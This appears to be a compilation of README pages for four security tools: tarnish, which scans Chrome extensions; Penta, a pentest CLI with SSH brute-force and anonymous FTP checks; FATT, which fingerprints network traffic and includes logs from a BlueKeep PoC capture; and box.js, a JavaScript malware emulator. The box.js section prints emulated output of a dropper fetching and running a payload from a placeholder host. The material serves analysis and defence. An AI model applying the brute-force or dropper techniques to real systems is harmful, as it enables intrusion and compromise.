The set up is a little complex due to a few design goals:
  • Effectively perform static analysis against Chrome extensions
  • Automatically scale up to handle increased workload with more instances, and scale back down.
  • Work on a shoestring budget (thus the use of ElasticBeanstalk with Spot Instances).
Some quick notes to help someone attempting to set this up:
  • tarnish makes use of Python Celery for analysis of extensions.
  • The Python Celery config uses redis as a broker (this will have to be created).
  • The workers which process extension analysis jobs run on AWS ElasticBeanstalk spot instances. For those unfamiliar, spot instances are basically bidding on unused compute. This allows the service to run super cheaply.
  • The workers require at least an AWS t2.medium instance to operate.
  • The tarnish frontend is just a set of static files, uploaded to an S3 bucket configured for static website hosting.
See the docker-compose.yaml.example for the environment variable configs. Ideally you'd run ./start.sh and navigate to the static frontend to get things running. You can use S3 for the static site or just a simple static webserver like python -m SimpleHTTPServer (you'll have to modify the JavaScript files to ensure the origin matches, etc.).

Features
Pulls any Chrome extension from a provided Chrome webstore link.
  • manifest.json viewer: simply displays a JSON-prettified version of the extension’s manifest.
  • Fingerprint Analysis: Detection of web_accessible_resources and automatic generation of Chrome extension fingerprinting JavaScript.
  • Potential Clickjacking Analysis: Detection of extension HTML pages with the web_accessible_resources directive set. These are potentially vulnerable to clickjacking depending on the purpose of the pages.
  • Permission Warning(s) viewer: which shows a list of all the Chrome permission prompt warnings which will be displayed upon a user attempting to install the extension.
  • Dangerous Function(s): shows the location of dangerous functions which could potentially be exploited by an attacker (e.g. functions such as innerHTML, chrome.tabs.executeScript).
  • Entry Point(s): shows where the extension takes in user/external input. This is useful for understanding an extension’s surface area and looking for potential points to send maliciously-crafted data to the extension.
  • Both the Dangerous Function(s) and Entry Point(s) scanners have the following for their generated alerts:
    • Relevant code snippet and line that caused the alert.
    • Description of the issue.
    • A “View File” button to view the full source file containing the code.
    • The path of the alerted file.
    • The full Chrome extension URI of the alerted file.
    • The type of file it is, such as a Background Page script, Content Script, Browser Action, etc.
    • If the vulnerable line is in a JavaScript file, the paths of all of the pages where it is included as well as these page’s type, and web_accessible_resource status.
  • Content Security Policy (CSP) analyzer and bypass checker: This will point out weaknesses in your extension’s CSP and will also illuminate any potential ways to bypass your CSP due to whitelisted CDNs, etc.
  • Known Vulnerable Libraries: This uses Retire.js to check for any usage of known-vulnerable JavaScript libraries.
  • Download extension and formatted versions.
  • Download the original extension.
  • Download a beautified version of the extension (auto prettified HTML and JavaScript).
  • Automatic caching of scan results: running an extension scan will take a good amount of time the first time you run it. The second time, assuming the extension hasn't been updated, will be almost instant due to the results being cached.
  • Linkable report URLs: easily link someone else to an extension report generated by tarnish.


Penta - Open Source All-In-One CLI Tool To Automate Pentesting





Penta is a pentest automation tool written in Python3.
(Future!) It will provide advanced features such as Metasploit and Nexpose integration to extract vuln info found on specific servers.


Installation

Install requirements
penta requires the following packages.
  • Python3.7
  • pipenv
Resolve python package dependency.
$ pipenv install
If you dislike pipenv...
$ pip install -r requirements.txt

Usage
$ pipenv run start <options>
If you dislike pipenv...
$ python penta/penta.py

Usage: List options
$ pipenv run start -h
usage: penta.py [-h] [-target TARGET] [-ports PORTS] [-proxy PROXY]

Penta is Pentest automation tool

optional arguments:
-h, --help show this help message and exit
-target TARGET Specify target IP / domain
-ports PORTS Please, specify the target port(s) separated by comma.
Default: 21,22,25,80,110,443,8080
-proxy PROXY Proxy[IP:PORT]

Usage: Main menu
[ ] === MENU LIST ===========================================
[0] EXIT
[1] Port scanning Default: 21,22,25,80,110,443,8080
[2] Nmap & vuln scanning
[3] Check HTTP option methods
[4] Grab DNS server info
[5] Shodan host search
[6] FTP connect with anonymous
[7] SSH connect with Brute Force
[99] Change target host
  1. Port scanning
    To check ports for a target. Log output supported.
  2. Nmap
    To check ports by additional means using nmap
  3. Check HTTP option methods
    To check the methods (e.g. GET,POST) for a target.
  4. Grab DNS server info
    To show the info about DNS server.
  5. Shodan host search
    To collect host service info from Shodan. A Shodan API key is required to enable this feature.
  6. FTP connect with anonymous
    To check whether anonymous access is enabled on port 21. FTP users can authenticate using the plain-text sign-in protocol (typically a username and password), but they can connect anonymously if the server is configured to allow it. Anyone can log in to the server if the administrator has allowed an FTP connection with an anonymous login.
  7. SSH connect with Brute Force
    To check SSH connections by brute force. Dictionary data is in data/dict.
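For a flavor of what a check like option 3 involves under the hood, here is a minimal Python sketch using the third-party requests library (illustrative only, not Penta's actual code; the target host is a placeholder):
import requests

# Illustrative sketch of an HTTP OPTIONS check, not Penta's actual code.
def check_http_methods(host, port=80):
    url = "http://{}:{}/".format(host, port)
    resp = requests.options(url, timeout=5)
    # Servers that support OPTIONS usually advertise methods in the Allow header.
    print(url, "->", resp.status_code, "Allow:", resp.headers.get("Allow", "<none>"))

check_http_methods("example.com")  # placeholder target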


FATT - A Script For Extracting Network Metadata And Fingerprints From Pcap Files And Live Network Traffic


FATT is a script for extracting network metadata and fingerprints such as JA3 and HASSH from packet capture files (pcap) or live network traffic. The main use-case is for monitoring honeypots, but you can also use it for other use cases such as network forensic analysis. fatt works on Linux, macOS and Windows.
Note that fatt uses pyshark (a python wrapper for tshark) and therefore its performance is not great! But that's not a big issue, as this is obviously not a tool you would use in production. You can use other network analysis tools such as Bro/Zeek, Suricata or Netcap for more serious use cases. Joy is another great tool you can use for capturing and analyzing network flow data.
Other than that, I'm working on a Go-based version of fatt, which is faster, and you can use its libraries in your gopacket-based tools such as packetbeat. I released the initial version of its gQUIC library (QUICk).

Features
  • Protocol support: SSL/TLS, SSH, RDP, HTTP, gQUIC.
    • To be added soon: IETF QUIC, MySQL, MSSQL, etc.
  • Fingerprinting
    • JA3: TLS client/server fingerprint
    • HASSH: SSH client/server fingerprint
    • RDFP: my experimental RDP fingerprint for standard RDP security protocol (note that other RDP security modes use TLS and can be fingerprinted with JA3)
    • HTTP header fingerprint
    • gQUIC/iQUIC fingerprint will be added soon
  • JSON output

Getting Started
  1. Install tshark
You need to first install tshark. Make sure you have version v2.9.0 or later. Tshark/Wireshark renamed 'ssl' to 'tls' as of version v2.9.0, and fatt is written for the new version of tshark.
If you have an old version of tshark (< v2.9.0), you can use the fatt script from the "old-tshark" branch.
  2. Install dependencies
cd fatt/
pip3 install pipenv
pipenv install
OR just install pyshark if you don't want to use a virtual environment:
pip3 install pyshark==0.4.2.2  
To activate the virtualenv, run pipenv shell:
$ pipenv shell
Launching subshell in virtual environment…
bash-3.2$ . /Users/adel/.local/share/virtualenvs/fatt-ucJHMzzt/bin/activate
(fatt-ucJHMzzt) bash-3.2$ python3 fatt.py -h
Alternatively, run the command inside the virtualenv with pipenv run:
$ pipenv run python3 fatt.py -h  
Output:
usage: fatt.py [-h] [-r READ_FILE] [-d READ_DIRECTORY] [-i INTERFACE]
               [-fp [{tls,ssh,rdp,http,gquic} [{tls,ssh,rdp,http,gquic} ...]]]
               [-da DECODE_AS] [-f BPF_FILTER] [-j] [-o OUTPUT_FILE]
               [-w WRITE_PCAP] [-p]

A python script for extracting network fingerprints

optional arguments:
  -h, --help            show this help message and exit
  -r READ_FILE, --read_file READ_FILE
                        pcap file to process
  -d READ_DIRECTORY, --read_directory READ_DIRECTORY
                        directory of pcap files to process
  -i INTERFACE, --interface INTERFACE
                        listen on interface
  -fp [{tls,ssh,rdp,http,gquic} [{tls,ssh,rdp,http,gquic} ...]], --fingerprint [{tls,ssh,rdp,http,gquic} [{tls,ssh,rdp,http,gquic} ...]]
                        protocols to fingerprint. Default: all
  -da DECODE_AS, --decode_as DECODE_AS
                        a dictionary of {decode_criterion_string: decode_as_protocol} that is used to tell tshark to decode protocols in situations it wouldn't usually.
  -f BPF_FILTER, --bpf_filter BPF_FILTER
                        BPF capture filter to use (for live capture only).'
  -j, --json_logging    log the output in json format
  -o OUTPUT_FILE, --output_file OUTPUT_FILE
                        specify the output log file. Default: fatt.log
  -w WRITE_PCAP, --write_pcap WRITE_PCAP
                        save the live captured packets to this file
  -p, --print_output    print the output

Usage

Live network traffic capture:
$ python3 fatt.py -i en0 --print_output --json_logging
192.168.1.10:59565 -> 192.168.1.3:80 [HTTP] hash=598c34a2838e82f9ec3175305f233b89 userAgent="Spotify/109600181 OSX/0 (MacBookPro14,3)"
192.168.1.10:59566 -> 13.237.44.5:22 [SSH] hassh=ec7378c1a92f5a8dde7e8b7a1ddf33d1 client=SSH-2.0-OpenSSH_7.9
13.237.44.5:22 -> 192.168.1.10:59566 [SSH] hasshS=3f0099d323fed5119bbfcca064478207 server=SSH-2.0-babeld-80573d3e
192.168.1.10:59584 -> 93.184.216.34:443 [TLS] ja3=e6573e91e6eb777c0933c5b8f97f10cd serverName=example.com
93.184.216.34:443 -> 192.168.1.10:59584 [TLS] ja3s=ae53107a2e47ea20c72ac44821a728bf
192.168.1.10:59588 -> 192.168.1.3:80 [HTTP] hash=598c34a2838e82f9ec3175305f233b89 userAgent="Spotify/109600181 OSX/0 (MacBookPro14,3)"
192.168.1.10:59601 -> 216.58.196.142:80 [HTTP] hash=d6662c018cd4169689ddf7c6c0f8ca1b userAgent="curl/7.54.0"
216.58.196.142:80 -> 192.168.1.10:59601 [HTTP] hash=c5241aca9a7c86f06f476592f5dda9a1 server=gws
192.168.1.10:54387 -> 216.58.203.99:443 [QUIC] UAID="Chrome/74.0.3729.169 Intel Mac OS X 10_14_5" SNI=clientservices.googleapis.com AEAD=AESG KEXS=C255
JSON output:
$ cat fatt.log
{"timestamp": "2019-05-28T03:41:25.415086", "sourceIp": "192.168.1.10", "destinationIp": "192.168.1.3", "sourcePort": "59565", "destinationPort": "80", "protocol": "http", "http": {"requestURI": "/DIAL/apps/com.spotify.Spotify.TVv2", "requestFullURI": "http://192.168.1.3/DIAL/apps/com.spotify.Spotify.TVv2", "requestVersion": "HTTP/1.1", "requestMethod": "GET", "userAgent": "Spotify/109600181 OSX/0 (MacBookPro14,3)", "clientHeaderOrder": "connection,accept_encoding,host,user_agent", "clientHeaderHash": "598c34a2838e82f9ec3175305f233b89"}}
{"timestamp": "2019-05-28T03:41:26.099574", "sourceIp": "13.237.44.5", "destinationIp": "192.168.1.10", "sourcePort": "22", "destinationPort": "59566", "protocol": "ssh", "ssh": {"server": "SSH-2.0-babeld-80573d3e", "hasshServer": "3f0099d323fed5119bbfcca064478207", "hasshServerAlgorithms": "curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,aes192-cbc,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha1-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1;none,zlib,zlib@openssh.com", "hasshVersion": "1.0", "skex": "curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256", "seastc": "chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,aes192-cbc,aes128-cbc", "smastc": "hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha1-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1", "scastc": "none,zlib,zlib@openssh.com", "slcts": "[Empty]", "slstc": "[Empty]", "seacts": "chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,aes192-cbc,aes128-cbc", "smacts": "hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha1-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1", "scacts": "none,zlib,zlib@openssh.com", "sshka": "ssh-dss,rsa-sha2-512,rsa-sha2-256,ssh-rsa"}}
{"timestamp": "2019-05-28T03:41:26.106737", "sourceIp": "192.168.1.10", "destinationIp": "13.237.44.5", "sourcePort": "59566", "destinationPort": "22", "protocol": "ssh", "ssh": {"client": "SSH-2.0-OpenSSH_7.9", "hassh": "ec7378c1a92f5a8dde7e8b7a1ddf33d1", "hasshAlgorithms": "curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c;chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,aes256-gcm@openssh.com;umac-64-etm@openssh.com,umac-128-etm@openssh.com,hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha1-etm@openssh.com,umac-64@openssh.com,umac-128@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1;none,zlib@openssh.com,zlib", "hasshVersion": "1.0", "ckex": "curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c", "ceacts": "chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,aes256-gcm@openssh.com", "cmacts": "umac-64-etm@openssh.com,umac-128-etm@openssh.com,hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha1-etm@openssh.com,umac-64@openssh.com,umac-128@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1", "ccacts": "none,zlib@openssh.com,zlib", "clcts": "[Empty]", "clstc": "[Empty]", "ceastc": "chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,aes256-gcm@openssh.com", "cmastc": "umac-64-etm@openssh.com,umac-128-etm@openssh.com,hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha1-etm@openssh.com,umac-64@openssh.com,umac-128@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1", "ccastc": "none,zlib@openssh.com,zlib", "cshka": "rsa-sha2-512-cert-v01@openssh.com,rsa-sha2-256-cert-v01@openssh.com,ssh-rsa-cert-v01@openssh.com,rsa-sha2-512,rsa-sha2-256,ssh-rsa,ecdsa-sha2-nistp256-cert-v01@openssh.com,ecdsa-sha2-nistp384-cert-v01@openssh.com,ecdsa-sha2-nistp521-cert-v01@openssh.com,ssh-ed25519-cert-v01@openssh.com,ecdsa-sha2-nistp256,ecdsa-sha2-nistp384,ecdsa-sha2-nistp521,ssh-ed25519"}}
{"timestamp": "2019-05-28T03:41:36.762811", "sourceIp": "192.168.1.10", "destinationIp": "93.184.216.34", "sourcePort": "59584", "destinationPort": "443", "protocol": "tls", "tls": {"serverName": "example.com", "ja3": "e6573e91e6eb777c0933c5b8f97f10cd", "ja3Algorithms": "771,49200-49196-49192-49188-49172-49162-159-107-57-52393-52392-52394-65413-196-136-129-157-61-53-192-132-49199-49195-49191-49187-49171-49161-158-103-51-190-69-156-60-47-186-65-49170-49160-22-10-255,0-11-10-13-16,29-23-24,0", "ja3Version": "771", "ja3Ciphers": "49200-49196-49192-49188-49172-49162-159-107-57-52393-52392-52394-65413-196-136-129-157-61-53-192-132-49199-49195-49191-49187-49171-49161-158-103-51-190-69-156-60-47-186-65-49170-49160-22-10-255", "ja3Extensions": "0-11-10-13-16", "ja3Ec": "29-23-24", "ja3EcFmt": "0"}}
{"timestamp": "2019-05-28T03:41:36.920935", "sourceIp": "93.184.216.34", "destinationIp": "192.168.1.10", "sourcePort": "443", "destinationPort": "59584", "protocol": "tls", "tls": {"ja3s": "ae53107a2e47ea20c72ac44821a728bf", "ja3sAlgorithms": "771,49199,65281-0-11-16", "ja3sVersion": "771", "ja3sCiphers": "49199", "ja3sExtensions": "65281-0-11-16"}}
{"timestamp": "2019-05-28T03:41:37.487609", "sourceIp": "192.168.1.10", "destinationIp": "192.168.1.3", "sourcePort": "59588", "destinationPort": "80", "protocol": "http", "http": {"requestURI": "/DIAL/apps/com.spotify.Spotify.TVv2", "requestFullURI": "http://192.168.1.3/DIAL/apps/com.spotify.Spotify.TVv2", "requestVersion": "HTTP/1.1", "requestMethod": "GET", "userAgent": "Spotify/109600181 OSX/0 (MacBookPro14,3)", "clientHeaderOrder": "connection,accept_encoding,host,user_agent", "clientHeaderHash": "598c34a2838e82f9ec3175305f233b89"}}
{"timestamp": "2019-05-28T03:41:48.700730", "sourceIp": "192.168.1.10", "destinationIp": "216.58.196.142", "sourcePort": "59601", "destinationPort": "80", "protocol": "http", "http": {"requestURI": "/", "requestFullURI": "http://google.com/", "requestVersion": "HTTP/1.1", "requestMethod": "GET", "userAgent": "curl/7.54.0", "clientHeaderOrder": "host,user_agent,accept", "clientHeaderHash": "d6662c018cd4169689ddf7c6c0f8ca1b"}}
{"timestamp": "2019-05-28T03:41:48.805393", "sourceIp": "216.58.196.142", "destinationIp": "192.168.1.10", "sourcePort": "80", "destinationPort": "59601", "protocol": "http", "http": {"server": "gws", "serverHeaderOrder": "location,content_type,date,cache_control,server,content_length", "serverHeaderHash": "c5241aca9a7c86f06f476592f5dda9a1"}}
{"timestamp": "2019-05-28T03:41:58.038530", "sourceIp": "192.168.1.10", "destinationIp": "216.58.203.99", "sourcePort": "54387", "destinationPort": "443", "protocol": "gquic", "gquic": {"tagNumber": "25", "sni": "clientservices.googleapis.com", "uaid": "Chrome/74.0.3729.169 Intel Mac OS X 10_14_5", "ver": "Q043", "aead": "AESG", "smhl": "1", "mids": "100", "kexs": "C255", "xlct": "cd9baccc808a6d3b", "copt": "NSTP", "ccrt": "cd9baccc808a6d3b67f8adc58015e3ff", "stk": "d6a64aeb563a19fe091bc34e8c038b0a3a884c5db7caae071180c5b739bca3dd7c42e861386718982fbe6db9d1cb136f799e8d10fd5a", "pdmd": "X509", "ccs": "01e8816092921ae8", "scid": "376976b980c73b669fea57104fb725c6"}}

Packet capture file (pcap):
Let's have a look at the captured traffic of Metasploit auxiliary scanner for the recent CVE-2019-0708 RDP vulnerability (BlueKeep).
Let's test it with another CVE-2019-0708 PoC:
$ python3 fatt.py -r RDP/cve-2019-0708_poc.pcap -p -j; cat fatt.log | python -m json.tool
192.168.1.10:54303 -> 192.168.1.20:3389 [RDP] req_protocols=0x00000001

{
    "destinationIp": "192.168.1.20",
    "destinationPort": "3389",
    "protocol": "rdp",
    "rdp": {
        "requestedProtocols": "0x00000001"
    },
    "sourceIp": "192.168.1.10",
    "sourcePort": "54303",
    "timestamp": "2019-05-23T18:41:42.572758"
}
This time we don't see the RDP ClientInfo message because the PoC uses TLS (not the standard RDP security protocol). So we can just see the Negotiation Request messages, but if you decode the packet as TLS, you can see the TLS clientHello and JA3 fingerprint. Here's how you can decode a specific port as another protocol:
$ python3 fatt.py -r RDP/cve-2019-0708_poc.pcap -p -j --decode_as '{"tcp.port==3389": "tls"}'
192.168.1.10:50026 -> 192.168.1.20:3389 [TLS] ja3=67e3d18fd9dddbbc8eca65f7dedac674 serverName=192.168.1.20
192.168.1.20:3389 -> 192.168.1.10:50026 [TLS] ja3s=649d6810e8392f63dc311eecb6b7098b

$ cat fatt.log
{"timestamp": "2019-05-23T17:21:56.056200", "sourceIp": "192.168.1.10", "destinationIp": "192.168.1.20", "sourcePort": "50026", "destinationPort": "3389", "protocol": "tls", "tls": {"serverName": "192.168.1.20", "ja3": "67e3d18fd9dddbbc8eca65f7dedac674", "ja3Algorithms": "771,49196-49195-49200-49199-159-158-49188-49187-49192-49191-49162-49161-49172-49171-57-51-157-156-61-60-53-47-10-106-64-56-50-19-5-4,0-5-10-11-13-35-23-65281,29-23-24,0", "ja3Version": "771", "ja3Ciphers": "49196-49195-49200-49199-159-158-49188-49187-49192-49191-49162-49161-49172-49171-57-51-157-156-61-60-53-47-10-106-64-56-50-19-5-4", "ja3Extensions": "0-5-10-11-13-35-23-65281", "ja3Ec": "29-23-24", "ja3EcFmt": "0"}}
{"timestamp": "2019-05-23T17:21:56.059333", "sourceIp": "192.168.1.20", "destinationIp": "192.168.1.10", "sourcePort": "3389", "destinationPort": "50026", "protocol": "tls", "tls": {"ja3s": "649d6810e8392f63dc311eecb6b7098b", "ja3sAlgorithms": "771,49192,23-65281", "ja3sVersion": "771", "ja3sCiphers": "49192", "ja3sExtensions": "23-65281"}}


box.js - A Tool For Studying JavaScript Malware


A utility to analyze malicious JavaScript.

Installation
Simply install box-js from npm:
npm install box-js --global

Usage
Looking to use box-js with Cuckoo? Use cuckoo-package.py as an analysis package.
Let's say you have a sample called sample.js: to analyze it, simply run
box-js sample.js
Chances are you will also want to download any payloads; use the flag --download to enable downloading. Otherwise, the engine will simulate a 404 error, so that the script is tricked into thinking the distribution site is down and will contact any fallback sites.
Box.js will emulate a Windows JScript environment, print a summary of the emulation to the console, and create a folder called sample.js.results (if it already exists, it will create sample.js.1.results and so on). This folder will contain:
  • analysis.log, a log of the analysis as it was printed on screen;
  • a series of files identified by UUIDs;
  • snippets.json, a list of pieces of code executed by the sample (JavaScript, shell commands, etc.);
  • urls.json, a list of URLs contacted;
  • active_urls.json, a list of URLs that seem to drop active malware;
  • resources.json, the ADODB streams (i.e. the files that the script wrote to disk) with file types and hashes;
  • IOC.json, a list of behaviours identified as IOCs (Indicators of Compromise). These include registry accesses, written files, HTTP requests and so on.
You can analyze these by yourself, or you can automatically submit them to Malwr, VirusTotal or a Cuckoo sandbox: for more information, run box-export --help.
For further isolation, it is recommended to run the analysis in a temporary Docker container. Consult integrations/README.md for more information.
If you wish to automate the analysis, you can use the return codes - documented in integrations/README.md - to distinguish between different types of errors.

Batch usage
While box.js is typically used on single files, it can also run batch analyses. You can simply pass a list of files or folders to analyse:
box-js sample1.js sample2.js /var/data/mySamples ...
By default box.js will process samples in parallel, running one analysis per core. You can use a different setting by specifying a value for --threads: in particular, 0 will remove the limit, making box-js spawn as many analysis threads as possible and resulting in very fast analysis but possibly overloading the system (note that analyses are usually CPU-bound, not RAM-bound).
You can use --loglevel=warn to silence analysis-related messages and only display progress info.
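For example, a batch run over a samples folder with four parallel analyses and quieter logging might look like this (the path is the placeholder folder from above; flags as documented below):
box-js /var/data/mySamples --threads=4 --loglevel=warn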
After the analysis is finished, you can extract the active URLs like this:
cat ./*.results/active_urls.json | sort | uniq

Flags
NAME                     DESCRIPTION
-h, --help               Show the help text and quit
-v, --version            Show the package version and quit
--license                Show the license and quit
--debug                  Die when an emulation error occurs, even in "batch mode", and pass on the exit code.
--loglevel               Logging level (debug, verbose, info, warning, error - default "info")
--threads                When running in batch mode, how many analyses to run at the same time (0 = unlimited, default: as many as the number of CPU cores)
--download               Actually download the payloads
--encoding               Encoding of the input sample (will be automatically detected by default)
--timeout                The script will timeout after this many seconds (default 10)
--output-dir             The location on disk to write the results files and folders to (defaults to the current directory)
--preprocess             Preprocess the original source code (makes reverse engineering easier, but takes a few seconds)
--unsafe-preprocess      More aggressive preprocessing. Often results in better code, but can break on some edge cases (eg. redefining prototypes)
--no-kill                Do not kill the application when runtime errors occur
--no-echo                When the script prints data, do not print it to the console
--no-rewrite             Do not rewrite the source code at all, other than for `@cc_on` support
--no-catch-rewrite       Do not rewrite try..catch clauses to make the exception global-scoped
--no-cc_on-rewrite       Do not rewrite `/*@cc_on <...>@*/` to `<...>`
--no-eval-rewrite        Do not rewrite `eval` so that its argument is rewritten
--no-file-exists         Return `false` for Scripting.FileSystemObject.FileExists(x)
--no-folder-exists       Return `false` for Scripting.FileSystemObject.FolderExists(x)
--function-rewrite       Rewrite function calls in order to catch eval calls
--no-rewrite-prototype   Do not rewrite expressions like `function A.prototype.B()` as `A.prototype.B = function()`
--no-hoist-prototype     Do not hoist expressions like `function A.prototype.B()` (implied by no-rewrite-prototype)
--no-shell-error         Do not throw a fake error when executing `WScriptShell.Run` (it throws a fake error by default to pretend that the distribution sites are down, so that the script will attempt to poll every site)
--no-typeof-rewrite      Do not rewrite `typeof` (e.g. `typeof ActiveXObject`, which must return 'unknown' in the JScript standard and not 'object')
--proxy                  [experimental] Use the specified proxy for downloads. This is not relevant if the --download flag is not present.
--windows-xp             Emulate Windows XP (influences the value of environment variables)
--dangerous-vm           Use the `vm` module, rather than `vm2`. This sandbox can be broken, so **don't use this** unless you're 100% sure of what you're doing. Helps with debugging by giving correct stack traces.

Analyzing the output

Console output
The first source of information is the console output. On a successful analysis, it will typically print something like this:
Using a 10 seconds timeout, pass --timeout to specify another timeout in seconds
Analyzing sample.js
Header set for http://foo.bar/baz: User-Agent Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)
Emulating a GET request to http://foo.bar/baz
Downloaded 301054 bytes.
Saved sample.js.results/a0af1253-597c-4eed-9e8f-5b633ff5f66a (301054 bytes)
sample.js.results/a0af1253-597c-4eed-9e8f-5b633ff5f66a has been detected as data.
Saved sample.js.results/f8df7228-7e0a-4241-9dae-c4e1664dc5d8 (303128 bytes)
sample.js.results/f8df7228-7e0a-4241-9dae-c4e1664dc5d8 has been detected as PE32 executable (GUI) Intel 80386, for MS Windows.
http://foo.bar/baz is an active URL.
Executing sample.js.results/d241e130-346f-4c0c-a698-f925dbd68f0c in the WScript shell
Header set for http://somethingelse.com/: User-Agent Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)
Emulating a GET request to http://somethingelse.com/
...
In this case, we are seeing a dropper that downloads a file from http://foo.bar/baz, setting the HTTP header User-Agent to Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0). Then, it proceeds to decode it, and write the result to disk (a PE32 executable). Finally, it runs some command in the Windows shell.
  • sample.js.results/a0af1253-597c-4eed-9e8f-5b633ff5f66a will contain the payload as it was downloaded from http://foo.bar/baz;
  • sample.js.results/f8df7228-7e0a-4241-9dae-c4e1664dc5d8 will contain the actual payload (PE executable);
  • sample.js.results/d241e130-346f-4c0c-a698-f925dbd68f0c will contain the command that was run in the Windows shell.

JSON logs
Every HTTP request is both printed on the terminal and logged in urls.json. Duplicate URLs aren't inserted (i.e. requesting the same URL twice will result in only one line in urls.json).
active_urls.json contains the list of URLs that eventually resulted in an executable payload. This file is the most interesting, if you're looking to take down distribution sites.
snippets.json contains every piece of code that box-js came across, either JavaScript, a cmd.exe command or a PowerShell script.
resources.json contains every file written to disk by the sample. For instance, if the application tried to save Hello world! to $PATH/foo.txt, the content of resources.json would be:
{
"9a24...": {
"path": "(path)\\foo.txt",
"type": "ASCII text, with no line terminators",
"md5": "86fb269d190d2c85f6e0468ceca42a20",
"sha1": "d3486ae9136e7856bc42212385ea797094475802",
"sha256": "c0535e4be2b79ffd93291305436bf889314e4a3faec05ecffcbb7df31ad9e51a"
}
}
The resources.json file is also important: watch out for any executable resource (eg. with "type": "PE32 executable (GUI) Intel 80386, for MS Windows").
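A quick way to sanity-check entries like the one above is to recompute the hashes yourself; a minimal Python sketch using the values from the example:
import hashlib

data = b"Hello world!"
print(hashlib.md5(data).hexdigest())     # 86fb269d190d2c85f6e0468ceca42a20
print(hashlib.sha1(data).hexdigest())    # d3486ae9136e7856bc42212385ea797094475802
print(hashlib.sha256(data).hexdigest())  # c0535e4be2b79ffd93291305436bf889314e4a3faec05ecffcbb7df31ad9e51a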

Patching
Some scripts in the wild have been observed to use new Date().getYear() where they mean new Date().getFullYear(). If a sample isn't showing any suspicious behaviour, watch out for Date checks.

If you run into .JSE files, compile the decoder and run it like this:
cc decoder.c -o decoder
./decoder foo.jse bar.js
box-js bar.js

Expanding
You may occasionally run into unsupported components. In this case, you can file an issue on GitHub, or emulate the component yourself if you know JavaScript.
The error will typically look like this (line numbers may be different):
1 Jan 00:00:00 - Unknown ActiveXObject WinHttp.WinHttpRequest.5.1
Trace
at kill (/home/CapacitorSet/box-js/run.js:24:10)
at Proxy.ActiveXObject (/home/CapacitorSet/box-js/run.js:75:4)
at evalmachine.<anonymous>:1:6471
at ContextifyScript.Script.runInNewContext (vm.js:18:15)
at ...
You can see that the exception was raised in Proxy.ActiveXObject, which looks like this:
function ActiveXObject(name) {
    name = name.toLowerCase();
    /* ... */
    switch (name) {
        case "wscript.shell":
            return require("./emulator/WScriptShell");
        /* ... */
        default:
            kill(`Unknown ActiveXObject ${name}`);
            break;
    }
}
Add a new case "winhttp.winhttprequest.5.1" (note the lowercase!), and have it return an ES6 Proxy object (eg. ProxiedWinHttpRequest). This is used to catch unimplemented features as soon as they're requested by the malicious sample:
/* emulator/WinHttpRequest.js */
const lib = require("../lib");

module.exports = function ProxiedWinHttpRequest() {
    return new Proxy(new WinHttpRequest(), {
        get: function(target, name, receiver) {
            switch (name) {
                /* Add here "special" traps with case statements */
                default:
                    if (name in target) return target[name];
                    else lib.kill(`WinHttpRequest.${name} not implemented!`)
            }
        }
    })
}

function WinHttpRequest() {

}
Rerun the analysis: it will fail again, telling you what exactly was not implemented.
1 Jan 00:00:00 - WinHttpRequest.open not implemented!
Trace
at kill (/home/CapacitorSet/box-js/run.js:24:10)
at Object.ProxiedWinHttpRequest.Proxy.get (/home/CapacitorSet/box-js/run.js:89:7)
Emulate WinHttpRequest.open as needed:
function WinHttpRequest() {
    this.open = function(method, url) {
        URLLogger(method, url);
        this.url = url;
    }
}
and iterate until the code emulates without errors.

Contributors
@CapacitorSet: Main developer
@daviesjamie:
  • npm packaging
  • command-line help
  • --output-directory
  • bugfixes
@ALange:
  • support for non-UTF8 encodings
  • bug reporting
@alexlamsl, @kzc
  • advice on integrating UglifyJS in box-js
  • improving the features of UglifyJS used in deobfuscation
@psrok:
  • bugfixes
@gaelmuller:
  • bugfixes

